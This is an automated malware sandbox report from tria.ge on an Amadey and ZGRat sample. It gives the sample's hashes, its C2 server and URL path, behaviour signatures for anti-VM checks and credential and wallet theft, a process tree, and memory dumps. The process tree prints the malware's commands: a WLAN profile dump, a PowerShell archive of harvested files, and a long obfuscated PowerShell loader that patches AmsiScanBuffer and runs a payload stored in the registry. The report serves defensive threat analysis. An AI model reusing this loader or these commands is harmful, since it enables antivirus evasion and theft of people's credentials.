Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

7ef012907e...da.exe

windows7-x64

10

7ef012907e...da.exe

windows10-1703-x64

10

7ef012907e...da.exe

windows10-2004-x64

10

7ef012907e...da.exe

windows11-21h2-x64

10

Resubmissions

29/03/2024, 14:25

240329-rrdgpsad9y

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240214-en
  • resource tags

    arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29/03/2024, 17:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe

  • Size

    1.9MB

  • MD5

    864674e8be395eb28bb181184add5c01

  • SHA1

    79bb9c0ae54bf8572328af06b6576327bd0a386c

  • SHA256

    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

  • SHA512

    7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

  • SSDEEP

    49152:EJ8NNvupgJi+RYYhQx/QAfi4oxa03C+v7sOh9yPQtE:Xvu+RIx/QAfiTY03C+z/yP

Score
10/10
amadeyzgratdiscoveryevasionratspywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Detect ZGRat V1 33 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:480
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1b10028d-5c48-4aa3-a4c7-7fe3371cdf44}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1988
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:704
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:1000
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:776
          • C:\Windows\sysmon.exe
            C:\Windows\sysmon.exe
            1⤵
              PID:2636
            • C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe
              "C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe"
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              PID:644
            • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
              C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
              1⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1272
              • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                "C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:416
                • C:\Users\Admin\AppData\Local\Temp\$77349eaa
                  "C:\Users\Admin\AppData\Local\Temp\$77349eaa"
                  3⤵
                  • Executes dropped EXE
                  PID:1624
              • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                "C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2256
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                    PID:1572
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3448
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 888
                    3⤵
                    • Program crash
                    PID:2904
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1544
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                    3⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:928
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profiles
                      4⤵
                        PID:4764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\567984660271_Desktop.zip' -CompressionLevel Optimal
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:732
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                    2⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    PID:2020
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2256 -ip 2256
                  1⤵
                    PID:3120
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:nurbKLIpuVAm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hvLwUxpeypvGws,[Parameter(Position=1)][Type]$AScrmXApYO)$vzZIBMyVkwj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+'le'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+'d'+'u'+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+'eg'+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+''+','+''+'S'+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+'n'+''+[Char](115)+''+'i'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oCl'+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$vzZIBMyVkwj.DefineConstructor(''+'R'+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+''+','+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$hvLwUxpeypvGws).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+[Char](105)+'me'+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');$vzZIBMyVkwj.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+'i'+''+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'ig'+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+'V'+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$AScrmXApYO,$hvLwUxpeypvGws).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $vzZIBMyVkwj.CreateType();}$PODHPxZvjXFmo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+'o'+'so'+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+'3'+[Char](50)+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+'N'+'a'+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+'o'+''+'d'+''+[Char](115)+'');$nSSyABpxhVOqow=$PODHPxZvjXFmo.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'ddre'+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vcQawFRxBXfpbweOvvr=nurbKLIpuVAm @([String])([IntPtr]);$EIzcOlxjLqPAVoDFUmXrnQ=nurbKLIpuVAm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bvPcQgBAoMp=$PODHPxZvjXFmo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'Mo'+[Char](100)+'ul'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$xAWzwRVVRxqYLP=$nSSyABpxhVOqow.Invoke($Null,@([Object]$bvPcQgBAoMp,[Object](''+[Char](76)+''+'o'+''+'a'+'dL'+'i'+''+'b'+'r'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$PKZEOWYPrQooyXBJt=$nSSyABpxhVOqow.Invoke($Null,@([Object]$bvPcQgBAoMp,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'alP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$NhaSydy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xAWzwRVVRxqYLP,$vcQawFRxBXfpbweOvvr).Invoke(''+'a'+'msi'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$aOSBcvciQwvkHnJxG=$nSSyABpxhVOqow.Invoke($Null,@([Object]$NhaSydy,[Object]('Am'+[Char](115)+'iS'+[Char](99)+''+'a'+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$CfeynSGvcV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PKZEOWYPrQooyXBJt,$EIzcOlxjLqPAVoDFUmXrnQ).Invoke($aOSBcvciQwvkHnJxG,[uint32]8,4,[ref]$CfeynSGvcV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$aOSBcvciQwvkHnJxG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PKZEOWYPrQooyXBJt,$EIzcOlxjLqPAVoDFUmXrnQ).Invoke($aOSBcvciQwvkHnJxG,[uint32]8,0x20,[ref]$CfeynSGvcV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                    1⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1952

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                    Filesize

                    1.9MB

                    MD5

                    864674e8be395eb28bb181184add5c01

                    SHA1

                    79bb9c0ae54bf8572328af06b6576327bd0a386c

                    SHA256

                    7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

                    SHA512

                    7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                    Filesize

                    2.4MB

                    MD5

                    69c9404e02e3d62bf925fb6f3e904393

                    SHA1

                    d9e1c766d54244ed5ad97bed3055ccecbd7e08fd

                    SHA256

                    6ee5b0595ce9ca29e97c2029236b7df8e4161cd1015954cc9a2c15760c88806c

                    SHA512

                    209975e9cfe82e3aa0d02410936633eb95682fbf5d31cb8947361fbabcbfad8341fc0888989d5585be86d6a54d55d1c3d57b05cde71014860cf815118ab90e89

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                    Filesize

                    379KB

                    MD5

                    90f41880d631e243cec086557cb74d63

                    SHA1

                    cb385e4172cc227ba72baf29ca1c4411fa99a26d

                    SHA256

                    23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

                    SHA512

                    eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aihz3tdt.5ve.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                    Filesize

                    109KB

                    MD5

                    2afdbe3b99a4736083066a13e4b5d11a

                    SHA1

                    4d4856cf02b3123ac16e63d4a448cdbcb1633546

                    SHA256

                    8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

                    SHA512

                    d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
                    Filesize

                    1.2MB

                    MD5

                    92fbdfccf6a63acef2743631d16652a7

                    SHA1

                    971968b1378dd89d59d7f84bf92f16fc68664506

                    SHA256

                    b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                    SHA512

                    b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                    Download Submit

                  • memory/416-103-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-85-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-47-0x0000000000210000-0x000000000047C000-memory.dmp

                    Filesize

                    2.4MB

                    Download

                  • memory/416-48-0x0000000073090000-0x0000000073841000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/416-49-0x0000000004EB0000-0x00000000050F2000-memory.dmp

                    Filesize

                    2.3MB

                    Download

                  • memory/416-122-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-118-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-107-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-105-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-101-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-99-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-97-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-95-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-93-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-91-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-89-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-87-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-50-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-51-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-53-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-55-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-57-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-59-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-61-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-63-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-65-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-67-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-69-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-71-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-73-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-75-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-77-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-79-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-81-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/416-83-0x0000000004EB0000-0x00000000050EB000-memory.dmp

                    Filesize

                    2.2MB

                    Download

                  • memory/644-2-0x0000000000650000-0x0000000000B28000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/644-4-0x0000000005590000-0x0000000005591000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-5-0x0000000005570000-0x0000000005571000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-6-0x00000000055C0000-0x00000000055C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-3-0x0000000005580000-0x0000000005581000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-7-0x0000000005550000-0x0000000005551000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-16-0x0000000000650000-0x0000000000B28000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/644-11-0x00000000055D0000-0x00000000055D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-10-0x00000000055E0000-0x00000000055E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-1-0x00000000776D6000-0x00000000776D8000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/644-9-0x00000000055B0000-0x00000000055B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/644-0-0x0000000000650000-0x0000000000B28000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/644-8-0x0000000005560000-0x0000000005561000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-24-0x0000000005840000-0x0000000005841000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-22-0x0000000005860000-0x0000000005861000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-19-0x0000000000DC0000-0x0000000001298000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/1272-25-0x0000000005850000-0x0000000005851000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-26-0x0000000005880000-0x0000000005881000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-27-0x00000000058C0000-0x00000000058C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-249-0x0000000000DC0000-0x0000000001298000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/1272-23-0x00000000058A0000-0x00000000058A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1272-218-0x0000000000DC0000-0x0000000001298000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/1272-20-0x0000000000DC0000-0x0000000001298000-memory.dmp

                    Filesize

                    4.8MB

                    Download

                  • memory/1272-21-0x0000000005870000-0x0000000005871000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2256-209-0x0000000073090000-0x0000000073841000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/2256-163-0x00000000026F0000-0x00000000046F0000-memory.dmp

                    Filesize

                    32.0MB

                    Download

                  • memory/2256-146-0x0000000073090000-0x0000000073841000-memory.dmp

                    Filesize

                    7.7MB

                    Download

                  • memory/2256-144-0x0000000000440000-0x00000000004A6000-memory.dmp

                    Filesize

                    408KB

                    Download

                  • memory/3448-237-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-278-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-233-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-231-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-254-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-252-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-256-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-259-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-257-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-261-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-262-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-266-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-264-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-268-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-269-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-271-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-273-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-235-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-219-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-280-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-281-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-283-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-288-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-301-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-169-0x0000000000400000-0x000000000044C000-memory.dmp

                    Filesize

                    304KB

                    Download

                  • memory/3448-298-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-285-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-307-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/3448-308-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download

